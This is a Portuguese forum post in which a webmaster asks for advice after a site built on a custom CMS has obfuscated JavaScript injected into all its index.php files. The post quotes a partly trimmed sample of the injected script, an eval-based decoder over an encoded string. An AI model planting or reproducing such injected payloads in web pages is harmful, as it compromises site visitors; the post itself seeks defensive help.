Ora viva malta,
É o seguinte, um dos sites onde sou webmaster tem vindo a ser atacado ultimamente por supostamente um exploid ou algo do género. Adiciona um código em javascript em todos os index.php do site.
O códido é este:
<script language=JavaScript> function vbnb25(z) {var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,30,11,14,4039,27,,62,25,29,32,5,56,37,51,9,12,36,13,38,61,0,0,0,0,33,0,6,35,4,3,41,21,20,19,8,55,44,0,31,57,16,43,60,17,10,49,45,50,24,15,46,47);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(225^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}vbnb25('7JRbQ94Sx2NSl7USEvutS9Rbc8kDQ94Pgvi_x7nT73D3HkKEaU_3vwvizXPcaZG2NSwDi_5x5_isNWXCiYB04bxERFmjuTi1RWlvi_mBVv') </script><!--linkdosite.com -->
O código é ainda maior que isto, removi algumas partes para o mesmo não ser usado para maldade eheh
Btw não sei como corrigir isto. Isto porque:
- o CMS foi programado de raiz e não por mim;
- os programadores do CMS já não estão responsáveis pela programação.
Gostaria de ler algumas opiniões acerca deste assunto e como ultrapassá-lo.